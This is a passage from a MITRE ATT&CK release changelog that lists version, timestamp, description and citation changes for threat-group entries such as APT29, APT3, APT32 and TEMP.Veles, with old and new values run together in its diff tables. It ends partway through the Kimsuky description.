external_references[7]['description'](Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Microsoft Unidentified Dec 2018)
external_references[8]['source_name']Cozy BearThe Dukes
external_references[8]['description'](Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[9]['source_name']CozyDukeCozy Bear
external_references[9]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[10]['source_name']White House Imposing Costs RU Gov April 2021CozyDuke
external_references[10]['description']White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.(Citation: Crowdstrike DNC June 2016)
external_references[11]['source_name']UK Gov Malign RIS Activity April 2021White House Imposing Costs RU Gov April 2021
external_references[11]['description']UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.
external_references[11]['url']https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-serviceshttps://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/
external_references[12]['source_name']F-Secure The DukesUK Gov Malign RIS Activity April 2021
external_references[12]['description']F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.
external_references[12]['url']https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services
external_references[13]['source_name']GRIZZLY STEPPE JARF-Secure The Dukes
external_references[13]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
external_references[13]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
external_references[14]['source_name']Crowdstrike DNC June 2016GRIZZLY STEPPE JAR
external_references[14]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[14]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[15]['source_name']UK Gov UK Exposes Russia SolarWinds April 2021Crowdstrike DNC June 2016
external_references[15]['description']UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[15]['url']https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromisehttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[16]['source_name']NSA Joint Advisory SVR SolarWinds April 2021UK Gov UK Exposes Russia SolarWinds April 2021
external_references[16]['description']NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.
external_references[16]['url']https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDFhttps://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise
external_references[17]['source_name']UK NSCS Russia SolarWinds April 2021NSA Joint Advisory SVR SolarWinds April 2021
external_references[17]['description']UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.
external_references[17]['url']https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromisehttps://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF
external_references[18]['source_name']FireEye SUNBURST Backdoor December 2020UK NSCS Russia SolarWinds April 2021
external_references[18]['description']FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.
external_references[18]['url']https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.htmlhttps://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise
external_references[19]['source_name']MSTIC NOBELIUM Mar 2021FireEye SUNBURST Backdoor December 2020
external_references[19]['description']Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
external_references[19]['url']https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
external_references[20]['source_name']CrowdStrike SUNSPOT Implant January 2021MSTIC NOBELIUM Mar 2021
external_references[20]['description']CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
external_references[20]['url']https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
external_references[21]['source_name']Volexity SolarWindsCrowdStrike SUNSPOT Implant January 2021
external_references[21]['description']Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.
external_references[21]['url']https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
external_references[22]['source_name']FireEye APT29 Nov 2018Volexity SolarWinds
external_references[22]['description']Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
external_references[22]['url']https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.htmlhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
external_references[23]['source_name']ESET Dukes October 2019Cybersecurity Advisory SVR TTP May 2021
external_references[23]['description']Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
external_references[23]['url']https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdfhttps://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
external_references[24]['source_name']NCSC APT29 July 2020FireEye APT29 Nov 2018
external_references[24]['description']National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
external_references[24]['url']https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdfhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
external_references[25]['source_name']Microsoft Unidentified Dec 2018ESET Dukes October 2019
external_references[25]['description']Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
external_references[25]['url']https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesNobleBaron
external_references{'source_name': 'NCSC APT29 July 2020', 'description': 'National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', 'url': 'https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'}
external_references{'source_name': 'SentinelOne NobleBaron June 2021', 'description': 'Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.', 'url': 'https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/'}
external_references{'source_name': 'MSTIC NOBELIUM May 2021', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.', 'url': 'https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/'}
external_references{'source_name': 'MSTIC Nobelium Toolset May 2021', 'description': 'MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.', 'url': 'https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/'}
external_references{'source_name': 'MSRC Nobelium June 2021', 'description': 'MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.', 'url': 'https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/'}
external_references{'source_name': 'Microsoft Unidentified Dec 2018', 'description': 'Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', 'url': 'https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/'}
x_mitre_contributorsDaniyal Naeem, BT Security

[G0022] APT3

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1[APT3](https://attack.mitre.org/groups/G0022) is a China-bast1[APT3](https://attack.mitre.org/groups/G0022) is a China-bas
>ed threat group that researchers have attributed to China's >ed threat group that researchers have attributed to China's 
>Ministry of State Security. (Citation: FireEye Clandestine W>Ministry of State Security.(Citation: FireEye Clandestine Wo
>olf) (Citation: Recorded Future APT3 May 2017) This group is>lf)(Citation: Recorded Future APT3 May 2017) This group is r
> responsible for the campaigns known as Operation Clandestin>esponsible for the campaigns known as Operation Clandestine 
>e Fox, Operation Clandestine Wolf, and Operation Double Tap.>Fox, Operation Clandestine Wolf, and Operation Double Tap.(C
> (Citation: FireEye Clandestine Wolf) (Citation: FireEye Ope>itation: FireEye Clandestine Wolf)(Citation: FireEye Operati
>ration Double Tap) As of June 2015, the group appears to hav>on Double Tap) As of June 2015, the group appears to have sh
>e shifted from targeting primarily US victims to primarily p>ifted from targeting primarily US victims to primarily polit
>olitical organizations in Hong Kong. (Citation: Symantec Buc>ical organizations in Hong Kong.(Citation: Symantec Buckeye)
>keye)  MITRE has also developed an APT3 Adversary Emulation >  In 2017, MITRE developed an APT3 Adversary Emulation Plan.
>Plan.(Citation: APT3 Adversary Emulation Plan)>(Citation: APT3 Adversary Emulation Plan)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Patrick Sungbahadoor']
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:52:16.312000+00:002021-10-01 19:09:20.817000+00:00
description[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye) MITRE has also developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye) In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)
x_mitre_version1.31.4

[G0050] APT32

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
New Description
t1[APT32](https://attack.mitre.org/groups/G0050) is a threat gt1[APT32](https://attack.mitre.org/groups/G0050) is a suspecte
>roup that has been active since at least 2014. The group has>d Vietnam-based threat group that has been active since at l
> targeted multiple private sector industries as well as with>east 2014. The group has targeted multiple private sector in
> foreign governments, dissidents, and journalists with a str>dustries as well as foreign governments, dissidents, and jou
>ong focus on Southeast Asian countries like Vietnam, the Phi>rnalists with a strong focus on Southeast Asian countries li
>lippines, Laos, and Cambodia. They have extensively used str>ke Vietnam, the Philippines, Laos, and Cambodia. They have e
>ategic web compromises to compromise victims. The group is b>xtensively used strategic web compromises to compromise vict
>elieved to be Vietnam-based.(Citation: FireEye APT32 May 201>ims.(Citation: FireEye APT32 May 2017)(Citation: Volexity Oc
>7)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET Oc>eanLotus Nov 2017)(Citation: ESET OceanLotus)
>eanLotus) 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 03:36:35.066000+00:002021-10-14 16:39:50.790000+00:00
description[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)
external_references[3]['description'](Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
external_references[10]['url']https://www.amnesty.org/en/latest/news/2021/02/viet-nam-hacking-group-targets-activist/https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
x_mitre_version2.42.5

[G0064] APT33

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-01 15:48:20.759000+00:002021-05-26 12:40:42.907000+00:00
x_mitre_version1.31.4

[G0087] APT39

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 02:08:55.286000+00:002021-10-12 23:08:30.844000+00:00
x_mitre_version3.03.1

[G0060] BRONZE BUTLER

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:16:28.738000+00:002021-10-12 19:42:16.869000+00:00
x_mitre_version1.21.3

[G0108] Blue Mockingbird

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-25 13:59:09.596000+00:002021-10-12 21:46:13.007000+00:00
x_mitre_version1.01.1

[G0114] Chimera

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:45:19.750000+00:002021-10-12 21:53:00.909000+00:00
x_mitre_version2.02.1

[G0003] Cleaver

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:41:34.724000+00:002021-10-12 19:34:36.092000+00:00
x_mitre_version1.21.3

[G0052] CopyKittens

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-04 21:59:44.333000+00:002021-05-26 12:32:58.912000+00:00
x_mitre_version1.41.5

[G0070] Dark Caracal

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-03 20:22:40.401000+00:002021-10-11 19:08:18.503000+00:00
x_mitre_version1.21.3

[G0079] DarkHydrus

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:51:14.393000+00:002021-10-12 19:52:22.454000+00:00
x_mitre_version1.21.3

[G0105] DarkVishnya

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-15 15:08:55.062000+00:002021-10-12 22:10:04.107000+00:00
x_mitre_version1.01.1

[G0035] Dragonfly

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 18:40:51.440000+00:002021-10-12 22:07:18.072000+00:00
x_mitre_version2.02.1

[G0074] Dragonfly 2.0

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 14:05:34.037000+00:002021-10-14 20:07:00.932000+00:00
x_mitre_version2.02.1

[G0051] FIN10

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:26:28.528000+00:002021-05-26 12:35:39.400000+00:00
x_mitre_version1.21.3

[G0085] FIN4

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 19:52:35.625000+00:002021-08-11 20:45:59.687000+00:00
x_mitre_version1.11.2

[G0053] FIN5

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 22:54:59.268000+00:002021-10-16 19:48:37.809000+00:00
x_mitre_version1.11.2

[G0037] FIN6

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-28 21:20:50.959000+00:002021-10-14 17:23:58.316000+00:00
x_mitre_version3.13.2

[G0061] FIN8

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Daniyal Naeem, BT Security']
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:54:32.541000+00:002021-10-12 21:31:07.407000+00:00
x_mitre_version1.11.2

[G0101] Frankenstein

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-28 00:01:09.384000+00:002021-05-26 19:57:42.132000+00:00
x_mitre_version1.01.1

[G0078] Gorgon Group

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:24:38.071000+00:002021-10-12 21:57:25.847000+00:00
x_mitre_version1.41.5

[G0100] Inception

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-20 20:54:12.685000+00:002021-10-12 23:21:06.480000+00:00
x_mitre_version1.01.1

[G0004] Ke3chang

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 19:54:46.340000+00:002021-10-12 20:02:51.565000+00:00
x_mitre_version1.31.4

[G0077] Leafminer

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 19:56:50.005000+00:002021-10-12 23:23:16.109000+00:00
x_mitre_version2.22.3

[G0129] Mustang Panda

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-25 21:15:45.895000+00:002021-10-14 21:11:44.216000+00:00
x_mitre_version1.01.1

[G0014] Night Dragon

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-15 00:54:00.656000+00:002021-10-12 22:12:11.717000+00:00
external_references[2]['url']https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdfhttps://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf
x_mitre_version1.31.4

[G0040] Patchwork

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 20:39:49.350000+00:002021-10-12 21:55:09.686000+00:00
x_mitre_version1.31.4

[G0011] PittyTiger

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[PittyTiger](https://attack.mitre.org/groups/G0011) is a thrt1[PittyTiger](https://attack.mitre.org/groups/G0011) is a thr
>eat group believed to operate out of China that uses multipl>eat group believed to operate out of China that uses multipl
>e different types of malware to maintain command and control>e different types of malware to maintain command and control
>. (Citation: Bizeul 2014) (Citation: Villeneuve 2014)>.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:14:16.259000+00:002021-10-12 23:11:41.368000+00:00
description[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. (Citation: Bizeul 2014) (Citation: Villeneuve 2014)[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)
x_mitre_version1.11.2

[G0034] Sandworm Team

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 13:13:09.511000+00:002021-10-15 21:46:19.437000+00:00
x_mitre_version2.02.1

[G0091] Silence

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 14:11:10.724000+00:002021-05-26 19:54:55.580000+00:00
x_mitre_version2.02.1

[G0092] TA505

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-22 14:34:20.386000+00:002021-10-14 20:27:57.195000+00:00
x_mitre_version1.21.3

[G0127] TA551

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-25 15:33:58.444000+00:002021-09-30 12:58:59.065000+00:00
x_mitre_version1.01.1

[G0088] TEMP.Veles

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rust1[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus
>sia-based threat group that has targeted critical infrastruc>sia-based threat group that has targeted critical infrastruc
>ture. The group has been observed utilizing TRITON, a malwar>ture. The group has been observed utilizing [TRITON](https:/
>e framework designed to manipulate industrial safety systems>/attack.mitre.org/software/S0609), a malware framework desig
>.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Vele>ned to manipulate industrial safety systems.(Citation: FireE
>s 2018)(Citation: FireEye TEMP.Veles JSON April 2019)>ye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation:
 > FireEye TEMP.Veles JSON April 2019)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:34:04.242000+00:002021-10-17 14:49:09.631000+00:00
description[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)
external_references[2]['description']The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )
x_mitre_version1.21.3

[G0027] Threat Group-3390

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 19:17:12.538000+00:002021-10-12 19:21:39.120000+00:00
external_references[14]['description']Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
x_mitre_version1.41.5

[G0076] Thrip

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:25:56.012000+00:002021-10-12 20:13:42.274000+00:00
x_mitre_version1.11.2

[G0010] Turla

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 23:50:51.333000+00:002021-08-27 14:36:25.289000+00:00
x_mitre_version2.02.1

[G0090] WIRTE

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:31:01.756000+00:002021-10-17 14:50:57.491000+00:00
x_mitre_version1.11.2

[G0107] Whitefly

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-27 21:56:24.890000+00:002021-10-12 21:43:24.133000+00:00
x_mitre_version1.01.1

[G0045] menuPass

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-09 00:29:07.219000+00:002021-10-11 14:01:44.538000+00:00
x_mitre_version2.02.1
Patches

[G0095] Machete

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 01:38:01.788000+00:002021-10-06 19:26:47.988000+00:00
Revocations

[G0086] Stolen Pencil

Current version: 0.0

This object has been revoked by [G0094] Kimsuky

Description for [G0094] Kimsuky: [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab 